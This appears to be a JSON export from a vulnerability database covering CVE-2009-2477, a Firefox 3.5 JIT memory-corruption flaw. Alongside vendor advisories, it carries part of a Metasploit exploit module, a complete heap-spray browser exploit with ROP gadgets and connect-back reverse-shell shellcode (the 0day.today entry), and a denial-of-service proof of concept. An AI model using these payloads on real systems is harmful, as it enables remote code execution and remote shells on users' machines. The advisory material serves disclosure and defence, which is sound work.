}\n}\n\nvar searchArray = new Array();\n\nfunction escapeData(data)\n{\n var xi;\n var xc;\n var escData='';\n for(xi=0; xi<data.length; xi++)\n {\n xc=data.charAt(xi);\n if(xc=='&' || xc=='?' || xc=='=' || xc=='%' || xc==' ') xc = escape(xc);\n escData+=xc;\n }\n return escData;\n}\n\nfunction DataTranslator()\n{\n searchArray = new Array();\n searchArray[0] = new Array();\n searchArray[0][\"#{var_data_str1}\"] = \"#{var_data_str2}\";\n var newElement = document.getElementById(\"content\");\n if (document.getElementsByTagName) {\n var xi=0;\n pTags = newElement.getElementsByTagName(\"p\");\n if (pTags.length > 0)\n while (xi < pTags.length)\n {\n oTags = pTags[xi].getElementsByTagName(\"font\");\n searchArray[xi+1] = new Array();\n if (oTags[0]) {\n searchArray[xi+1][\"#{var_data_str1}\"] = oTags[0].innerHTML;\n }\n xi++;\n }\n }\n}\n\nfunction GenerateHTML()\n{\n var xhtml = \"\";\n for (xi=1;xi<searchArray.length;xi++)\n {\n xhtml += escapeData(searchArray[xi][\"#{var_data_str1}\"]);\n }\n}\n\nsetInterval(\"fill_function()\", .5);\nEOF\n\n # Obfuscate it up a bit\n js = obfuscate_js(js, 'Symbols' => {\n 'Variables' => %W{ DataTranslator GenerateHTML escapeData 
xunescape\n shellcode oneblock fullblock sprayContainer xi searchArray xc\n escData xhtml pTags oTags newElement sprayready sprayContainerIndex\n fill_function }\n }).to_s\n\n str1 = Rex::Text.rand_text_alpha(20)\n str2 = Rex::Text.rand_text_alpha(24)\n str3 = Rex::Text.rand_text_alpha(10) + \" \"\n\n return %Q^\n<html>\n<head>\n<div id=\"content\">\n<p>\n<FONT>\n</FONT>\n</p>\n<p>\n<FONT>#{str1}</FONT></p>\n<p>\n<FONT>#{str2}</FONT>\n</p>\n<p>\n<FONT>#{str3}</FONT>\n</p>\n</div>\n<script language=\"JavaScript\">\n#{js}\n</script>\n</body>\n</html>\n^\n\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/firefox_escape_retval.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:31", "bulletinFamily": "software", "cvelist": ["CVE-2009-2477"], "description": "Mozilla Foundation Security Advisory 2009-41\r\n\r\nTitle: Corrupt JIT state after deep return from native function\r\nImpact: Critical\r\nAnnounced: July 16, 2009\r\nReporter: zbyte\r\nProducts: Firefox 3.5\r\n\r\nFixed in: Firefox 3.5.1\r\nDescription\r\n\r\nFirefox user zbyte reported a crash that we determined could result in an exploitable memory corruption problem. In certain cases after a return from a native function, such as escape(), the Just-in-Time (JIT) compiler could get into a corrupt state. This could be exploited by an attacker to run arbitrary code such as installing malware.\r\n\r\nWe would like to thank community members Lucas Kruijswijk and Nochum Sossonko for isolating the problematic script from the original crashing site.\r\n\r\nThis vulnerability does not affect earlier versions of Firefox which do not support the JIT feature.\r\nWorkaround\r\n\r\nUsers of Firefox 3.5 can avoid this vulnerability by disabling the Just-in-Time compiler as described in the Mozilla Security Blog. 
That workaround is not necessary in Firefox 3.5.1 and can be reverted.\r\nReferences\r\n\r\n * https://bugzilla.mozilla.org/show_bug.cgi?id=503286\r\n * Critical JavaScript vulnerability in Firefox 3.5, Mozilla Security Blog\r\n * CVE-2009-2477\r\n", "edition": 1, "modified": "2009-07-22T00:00:00", "published": "2009-07-22T00:00:00", "id": "SECURITYVULNS:DOC:22196", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22196", "title": "Mozilla Foundation Security Advisory 2009-41", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:33", "bulletinFamily": "software", "cvelist": ["CVE-2009-2477", "CVE-2009-2469", "CVE-2009-1194", "CVE-2009-2464", "CVE-2009-2472", "CVE-2009-2467", "CVE-2009-2463", "CVE-2009-2471", "CVE-2009-2462", "CVE-2009-2465"], "description": "Multiple memory corruptions, cross-site access, integer overflows, buffer overflows.", "edition": 1, "modified": "2009-07-22T00:00:00", "published": "2009-07-22T00:00:00", "id": "SECURITYVULNS:VULN:10089", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10089", "title": "Multiple Mozilla Firefox security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:13", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2477"], "description": "\nMozilla Project reports:\n\nFirefox user zbyte reported a crash that we determined could result\n\t in an exploitable memory corruption problem. In certain cases after a\n\t return from a native function, such as escape(), the Just-in-Time\n\t (JIT) compiler could get into a corrupt state. 
This could be exploited\n\t by an attacker to run arbitrary code such as installing malware.\nThis vulnerability does not affect earlier versions of Firefox\n\t which do not support the JIT feature.\n\n", "edition": 4, "modified": "2010-05-02T00:00:00", "published": "2009-07-16T00:00:00", "id": "C1EF9B33-72A6-11DE-82EA-0030843D3802", "href": "https://vuxml.freebsd.org/freebsd/c1ef9b33-72a6-11de-82ea-0030843d3802.html", "title": "mozilla -- corrupt JIT state after deep return from native function", "type": "freebsd", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2019-05-29T17:19:51", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2477"], "edition": 2, "description": "Added: 07/13/2009 \nCVE: [CVE-2009-2477](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2477>) \nBID: [35660](<http://www.securityfocus.com/bid/35660>) \nOSVDB: [55846](<http://www.osvdb.org/55846>) \n\n\n### Background\n\n[Mozilla](<http://www.mozilla.org>) is a suite of Internet client products available for multiple platforms. \n\n### Problem\n\nA memory corruption vulnerability in Mozilla Firefox in the way it handles JIT escape function calls allows arbitrary code injection and execution when a user loads a malicious web page. \n\n### Resolution\n\n[Upgrade](<http://www.mozilla.com/firefox/>) to Firefox 3.5.1 or higher. \n\n### References\n\n<http://www.mozilla.org/security/announce/2009/mfsa2009-41.html> \n\n\n### Limitations\n\nThe target Windows XP system must have at least 1G virtual memory allocated. The target Linux system must have at least 2G physical memory. Exploit works on Firefox 3.5. In order for exploitation to succeed, a user must load the exploit in a vulnerable browser. \n\nAfter a user loads the exploit page, there may be a delay before the exploit succeeds. 
\n\n### Platforms\n\nWindows XP \nLinux \nMac OS X \n \n\n", "modified": "2009-07-13T00:00:00", "published": "2009-07-13T00:00:00", "id": "SAINT:79C3307CF1A514410E9FEAEBB6F7E752", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/firefox_jitescapefunction_memory_corruption", "type": "saint", "title": "Mozilla Firefox JIT Escape Function Memory Corruption", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:59", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2477"], "description": "Added: 07/13/2009 \nCVE: [CVE-2009-2477](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2477>) \nBID: [35660](<http://www.securityfocus.com/bid/35660>) \nOSVDB: [55846](<http://www.osvdb.org/55846>) \n\n\n### Background\n\n[Mozilla](<http://www.mozilla.org>) is a suite of Internet client products available for multiple platforms. \n\n### Problem\n\nA memory corruption vulnerability in Mozilla Firefox in the way it handles JIT escape function calls allows arbitrary code injection and execution when a user loads a malicious web page. \n\n### Resolution\n\n[Upgrade](<http://www.mozilla.com/firefox/>) to Firefox 3.5.1 or higher. \n\n### References\n\n<http://www.mozilla.org/security/announce/2009/mfsa2009-41.html> \n\n\n### Limitations\n\nThe target Windows XP system must have at least 1G virtual memory allocated. The target Linux system must have at least 2G physical memory. Exploit works on Firefox 3.5. In order for exploitation to succeed, a user must load the exploit in a vulnerable browser. \n\nAfter a user loads the exploit page, there may be a delay before the exploit succeeds. 
\n\n### Platforms\n\nWindows XP \nLinux \nMac OS X \n \n\n", "edition": 1, "modified": "2009-07-13T00:00:00", "published": "2009-07-13T00:00:00", "id": "SAINT:F7D0051E55E1A2E3BD0584B843CFE221", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/firefox_jitescapefunction_memory_corruption", "type": "saint", "title": "Mozilla Firefox JIT Escape Function Memory Corruption", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:36", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2477"], "description": "Added: 07/13/2009 \nCVE: [CVE-2009-2477](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2477>) \nBID: [35660](<http://www.securityfocus.com/bid/35660>) \nOSVDB: [55846](<http://www.osvdb.org/55846>) \n\n\n### Background\n\n[Mozilla](<http://www.mozilla.org>) is a suite of Internet client products available for multiple platforms. \n\n### Problem\n\nA memory corruption vulnerability in Mozilla Firefox in the way it handles JIT escape function calls allows arbitrary code injection and execution when a user loads a malicious web page. \n\n### Resolution\n\n[Upgrade](<http://www.mozilla.com/firefox/>) to Firefox 3.5.1 or higher. \n\n### References\n\n<http://www.mozilla.org/security/announce/2009/mfsa2009-41.html> \n\n\n### Limitations\n\nThe target Windows XP system must have at least 1G virtual memory allocated. The target Linux system must have at least 2G physical memory. Exploit works on Firefox 3.5. In order for exploitation to succeed, a user must load the exploit in a vulnerable browser. \n\nAfter a user loads the exploit page, there may be a delay before the exploit succeeds. 
\n\n### Platforms\n\nWindows XP \nLinux \nMac OS X \n \n\n", "edition": 4, "modified": "2009-07-13T00:00:00", "published": "2009-07-13T00:00:00", "id": "SAINT:C17E7E1CCDF4A2472D0ABE5E701B087C", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/firefox_jitescapefunction_memory_corruption", "title": "Mozilla Firefox JIT Escape Function Memory Corruption", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-04-06T03:37:46", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2016-12-19T00:00:00", "type": "zdt", "title": "Naenara Browser 3.5 (RedStar 3.0 Desktop) - JACKRABBIT Client-Side Command Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2477"], "modified": "2016-12-19T00:00:00", "href": "https://0day.today/exploit/description/26548", "id": "1337DAY-ID-26548", "sourceData": "<!-- \r\nDownload: https://github.com/HackerFantastic/Public/blob/master/exploits/jackrabbit.tgz\r\nMirror: //github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40936.tgz\r\n-->\r\n \r\n<html>\r\n<head>\r\n<div id=\"content\">\r\n<p>\r\n<FONT>\r\n</FONT>\r\n</p>\r\n<p>\r\n<FONT>n0m3rcYn0M3rCyn0m3Rc</FONT></p>\r\n<p>\r\n<FONT>N0MeRCYn0m3rCyn0m3rCyn0m</FONT>\r\n</p>\r\n<p>\r\n<FONT>n0MERCypDK </FONT>\r\n</p>\r\n</div>\r\n<script language=\"JavaScript\">\r\nvar xunescape = unescape;\r\noneblock = xunescape(\"%u0040%u1000\");\r\nstackpivot = xunescape(\"%u6885%u0805%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u5a91%u0805%u4141%u4141\");\r\nnopsled = 
xunescape(\"%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u
0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568\"); \r\n \r\nropgadget = xunescape(\"%udc08%u0490%ua408%u04bd%u0008%u0200%u0000%u0f00%u0700%u0000%u2200%u0000%u0000%u0000%u0000%u0000%uec00%u0491%u0008%u0200%u0000%u0200%uc100%u10e3%u0040%u0010%u0000%u0200%u9000\")\r\n \r\n<!-- connect back (\"192.168.0.10,80\") ffff = port, 01020304 = ipaddr 
\"%udc08%u0490%ua408%u04bd%u0008%u0200%u0000%u0f00%u0700%u0000%u2200%u0000%u0000%u0000%u0000%u0000%uec00%u0491%u0008%u0200%u0000%u0200%uc100%u10e3%u0040%u0010%u0000%u0200%u9000%u9090%u9090%u9090%u9090%u9090%u3190%u53db%u5343%u026a%u666a%u8958%ucde1%u9380%ub059%ucd3f%u4980%uf979%u5a5b%u0168%u0302%u6604%uff68%u43ff%u5366%ue189%u66b0%u5150%u8953%u43e1%u80cd%u6852%u2f2f%u6873%u2f68%u6962%u896e%u52e3%u8953%ub0e1%ucd0b%u0080%u6568%u7061%u6120%u6464%u3a72%u2520%u3830%u0a78%u7200%u6e75%u696e%u676e%u6620%u6f72%u206d%u6568%u2061\" -->\r\n \r\nshellcode = xunescape(\"%u9090%u9090%u9090%u9090%u9090%u3190%u53db%u5343%u026a%u666a%u8958%ucde1%u9380%ub059%ucd3f%u4980%uf979%u5a5b%uc068%u00a8%u660a%u0068%u4350%u5366%ue189%u66b0%u5150%u8953%u43e1%u80cd%u6852%u2f2f%u6873%u2f68%u6962%u896e%u52e3%u8953%ub0e1%ucd0b%u0080%u6568%u7061%u6120%u6464%u3a72%u2520%u3830%u0a78%u7200%u6e75%u696e%u676e%u6620%u6f72%u206d%u6568%u2061\");\r\n \r\n \r\nvar fullblock = oneblock; \r\nwhile (fullblock.length < 393216)\r\n{\r\n fullblock += fullblock;\r\n}\r\n \r\nvar sprayContainer = new Array();\r\nvar sprayready = false;\r\nvar sprayContainerIndex = 0;\r\n \r\nfunction fill_function()\r\n{\r\n if(! 
sprayready) {\r\n for (xi=0; xi<800/100; xi++, sprayContainerIndex++)\r\n {\r\n sprayContainer[sprayContainerIndex] = fullblock + stackpivot + oneblock + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + ropgadget + shellcode;\r\n }\r\n } else {\r\n DataTranslator();\r\n GenerateHTML();\r\n }\r\n if(sprayContainer.length >= 1000) {\r\n sprayready = true;\r\n }\r\n}\r\n \r\nvar searchArray = new Array();\r\n \r\nfunction escapeData(data)\r\n{\r\n var xi;\r\n var xc;\r\n var escData='';\r\n for(xi=0; xi<data.length; xi++)\r\n {\r\n xc=data.charAt(xi);\r\n if(xc=='&' || xc=='?' 
 || xc=='=' || xc=='%' || xc==' ') xc = escape(xc);\r\n escData+=xc;\r\n }\r\n return escData;\r\n}\r\n \r\nfunction DataTranslator()\r\n{\r\n searchArray = new Array();\r\n searchArray[0] = new Array();\r\n searchArray[0][\"dac\"] = \"Kros\";\r\n var newElement = document.getElementById(\"content\");\r\n if (document.getElementsByTagName) {\r\n var xi=0;\r\n pTags = newElement.getElementsByTagName(\"p\");\r\n if (pTags.length > 0)\r\n while (xi < pTags.length)\r\n {\r\n oTags = pTags[xi].getElementsByTagName(\"font\");\r\n searchArray[xi+1] = new Array();\r\n if (oTags[0]) {\r\n searchArray[xi+1][\"dac\"] = oTags[0].innerHTML;\r\n }\r\n xi++;\r\n }\r\n }\r\n}\r\n \r\nfunction GenerateHTML()\r\n{\r\n var xhtml = \"\";\r\n for (xi=1;xi<searchArray.length;xi++)\r\n {\r\n xhtml += escapeData(searchArray[xi][\"dac\"]);\r\n }\r\n}\r\n \r\nsetInterval(\"fill_function()\", .5);\r\n \r\n</script>\r\n</body>\r\n</html>\n\n# 0day.today [2018-04-06] #", "sourceHref": "https://0day.today/exploit/26548", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T18:57:47", "description": "Bugraq ID: 35707\r\nCVE ID: CVE-2009-2479\r\nCNCVE ID: CNCVE-20092479\r\n\r\nMozilla Firefox is an open-source web browser.\r\nMozilla Firefox has a flaw in its handling of Unicode data that a remote attacker can exploit to crash the application.\r\nThe vulnerability is triggered when a user is lured into opening a crafted malicious web page.\n\nMozilla Firefox 3.5.1\r\nMozilla Firefox 3.5\r\nMozilla Firefox 3.0.11\r\nMozilla Firefox 3.0.10\r\nMozilla Firefox 3.0.9\r\nMozilla Firefox 3.0.8\r\nMozilla Firefox 3.0.7\r\nMozilla Firefox 3.0.6\r\nMozilla Firefox 3.0.5\r\nMozilla Firefox 3.0.4\r\nMozilla Firefox 3.0.3\r\nMozilla Firefox 3.0.2\r\nMozilla Firefox 
3.0.1\r\nMozilla Firefox 3.0\nNo solution is currently available:\r\nhttp://www.mozilla.com/en-US/", "published": "2009-07-21T00:00:00", "title": "Mozilla Firefox Unicode Data Remote Denial of Service Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2479"], "modified": "2009-07-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11848", "id": "SSV:11848", "sourceData": "\n <html>\r\n<head>\r\n<script language=\"JavaScript\" type=\"Text/Javascript\">\r\n var str = unescape(\"%u4141%u4141\");\r\n var str2 = unescape(\"%u0000%u0000\");\r\n var finalstr2 = mul8(str2, 49000000);\r\n var finalstr = mul8(str, 21000000);\r\ndocument.write(finalstr2);\r\ndocument.write(finalstr);\r\nfunction mul8 (str, num) {\r\n var i = Math.ceil(Math.log(num) / Math.LN2),\r\n res = str;\r\n do {\r\n res += res;\r\n } while (0 < --i);\r\n return res.slice(0, str.length * num);\r\n}\r\n</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n<html><body></body></html>\n ", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-11848"}], "gentoo": [{"lastseen": "2016-09-06T19:46:13", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1945", "CVE-2011-3648", "CVE-2009-0355", "CVE-2011-0061", "CVE-2011-0077", "CVE-2012-0478", "CVE-2012-4193", "CVE-2011-1202", "CVE-2012-0442", "CVE-2010-3772", "CVE-2011-0071", "CVE-2009-2470", "CVE-2010-0654", "CVE-2009-3388", "CVE-2012-1962", "CVE-2012-0443", "CVE-2011-3866", "CVE-2011-0068", "CVE-2012-5842", "CVE-2012-4212", "CVE-2009-2477", "CVE-2009-1563", "CVE-2010-0176", "CVE-2011-3640", "CVE-2011-0083", "CVE-2010-1203", "CVE-2009-3076", "CVE-2012-1970", "CVE-2009-3389", "CVE-2008-3835", "CVE-2012-3989", "CVE-2010-2762", "CVE-2012-5830", "CVE-2012-4210", "CVE-2009-1305", "CVE-2011-3026", "CVE-2009-3979", "CVE-2011-2370", "CVE-2012-0460", "CVE-2012-1973", "CVE-2009-3376", "CVE-2011-2369", 
"CVE-2011-2998", "CVE-2011-3654", "CVE-2011-2605", "CVE-2009-1833", "CVE-2010-0165", "CVE-2012-1974", "CVE-2010-0220", "CVE-2010-2766", "CVE-2011-2993", "CVE-2012-4195", "CVE-2010-0168", "CVE-2012-3986", "CVE-2010-0160", "CVE-2009-1169", "CVE-2011-2371", "CVE-2009-3379", "CVE-2012-4185", "CVE-2010-3777", "CVE-2012-3991", "CVE-2012-5354", "CVE-2012-4206", "CVE-2009-3071", "CVE-2012-3968", "CVE-2010-1214", "CVE-2012-3963", "CVE-2010-0174", "CVE-2010-0172", "CVE-2009-2535", "CVE-2012-0452", "CVE-2009-1312", "CVE-2012-1956", "CVE-2012-3978", "CVE-2012-3985", "CVE-2011-2995", "CVE-2012-5829", "CVE-2009-1571", "CVE-2008-5505", "CVE-2012-5838", "CVE-2011-2986", "CVE-2010-1205", "CVE-2009-2210", "CVE-2009-2478", "CVE-2008-6961", "CVE-2012-0479", "CVE-2012-0450", "CVE-2012-1940", "CVE-2012-3993", "CVE-2008-5500", "CVE-2012-5836", "CVE-2009-3274", "CVE-2010-1125", "CVE-2009-0772", "CVE-2012-3995", "CVE-2012-4201", "CVE-2010-0159", "CVE-2009-0773", "CVE-2011-3659", "CVE-2011-3663", "CVE-2010-3131", "CVE-2012-0470", "CVE-2012-0446", "CVE-2008-4063", "CVE-2012-3976", "CVE-2012-1972", "CVE-2010-1200", "CVE-2010-0175", "CVE-2010-0170", "CVE-2012-3988", "CVE-2012-0457", "CVE-2010-3778", "CVE-2012-3994", "CVE-2007-2436", "CVE-2012-3962", "CVE-2010-2770", "CVE-2010-3774", "CVE-2012-0459", "CVE-2011-2362", "CVE-2009-1304", "CVE-2010-1213", "CVE-2010-3177", "CVE-2012-5843", "CVE-2009-1835", "CVE-2011-0085", "CVE-2009-0352", "CVE-2009-3984", "CVE-2009-3380", "CVE-2008-5510", "CVE-2011-0080", "CVE-2012-1950", "CVE-2008-5502", "CVE-2009-3981", "CVE-2010-3765", "CVE-2010-0167", "CVE-2009-3373", "CVE-2009-3980", "CVE-2008-4070", "CVE-2012-4183", "CVE-2010-3178", "CVE-2012-1994", "CVE-2011-3661", "CVE-2009-3383", "CVE-2012-4181", "CVE-2011-3652", "CVE-2009-1311", "CVE-2011-1712", "CVE-2008-4067", "CVE-2010-1210", "CVE-2011-2364", "CVE-2009-2469", "CVE-2011-0073", "CVE-2010-1197", "CVE-2010-1207", "CVE-2009-0652", "CVE-2012-4186", "CVE-2012-1948", "CVE-2008-5012", "CVE-2011-2982", 
"CVE-2012-1938", "CVE-2012-0449", "CVE-2010-3769", "CVE-2012-3969", "CVE-2009-1838", "CVE-2012-1953", "CVE-2008-5013", "CVE-2012-1949", "CVE-2012-0456", "CVE-2011-2372", "CVE-2010-3773", "CVE-2009-1309", "CVE-2011-0079", "CVE-2010-3169", "CVE-2009-2662", "CVE-2012-3970", "CVE-2011-2997", "CVE-2011-0053", "CVE-2009-1832", "CVE-2012-5840", "CVE-2010-3176", "CVE-2012-4191", "CVE-2010-3174", "CVE-2012-1966", "CVE-2010-3768", "CVE-2009-3372", "CVE-2010-2763", "CVE-2011-0066", "CVE-2010-1212", "CVE-2009-1837", "CVE-2010-1206", "CVE-2010-1211", "CVE-2009-2464", "CVE-2011-2990", "CVE-2010-1121", "CVE-2009-0356", "CVE-2011-3389", "CVE-2010-0164", "CVE-2008-3836", "CVE-2010-3167", "CVE-2012-4202", "CVE-2007-2671", "CVE-2011-2984", "CVE-2010-3180", "CVE-2012-3957", "CVE-2011-3660", "CVE-2009-3986", "CVE-2012-1941", "CVE-2009-2408", "CVE-2010-3399", "CVE-2009-2665", "CVE-2008-4066", "CVE-2008-5018", "CVE-2009-3978", "CVE-2012-3984", "CVE-2009-0354", "CVE-2009-3079", "CVE-2011-0056", "CVE-2012-0444", "CVE-2011-3650", "CVE-2010-2753", "CVE-2012-1946", "CVE-2010-3776", "CVE-2010-1215", "CVE-2012-4182", "CVE-2011-2980", "CVE-2012-4187", "CVE-2008-4069", "CVE-2010-0166", "CVE-2011-3647", "CVE-2011-0065", "CVE-2011-0062", "CVE-2008-0016", "CVE-2009-0358", "CVE-2011-3101", "CVE-2010-3168", "CVE-2010-0173", "CVE-2009-1044", "CVE-2008-5513", "CVE-2008-4059", "CVE-2010-2764", "CVE-2011-0081", "CVE-2009-0771", "CVE-2009-1392", "CVE-2008-5504", "CVE-2008-5019", "CVE-2012-1954", "CVE-2009-0774", "CVE-2009-3375", "CVE-2012-0461", "CVE-2011-2376", "CVE-2009-2472", "CVE-2012-3958", "CVE-2009-0071", "CVE-2008-5023", "CVE-2012-0469", "CVE-2010-3171", "CVE-2009-3072", "CVE-2012-3973", "CVE-2008-5822", "CVE-2012-1975", "CVE-2011-0075", "CVE-2012-0464", "CVE-2012-1967", "CVE-2011-3653", "CVE-2010-0648", "CVE-2010-0178", "CVE-2010-3166", "CVE-2010-0177", "CVE-2011-0074", "CVE-2012-3956", "CVE-2010-2769", "CVE-2011-3649", "CVE-2012-3982", "CVE-2009-3555", "CVE-2011-2989", "CVE-2010-1196", 
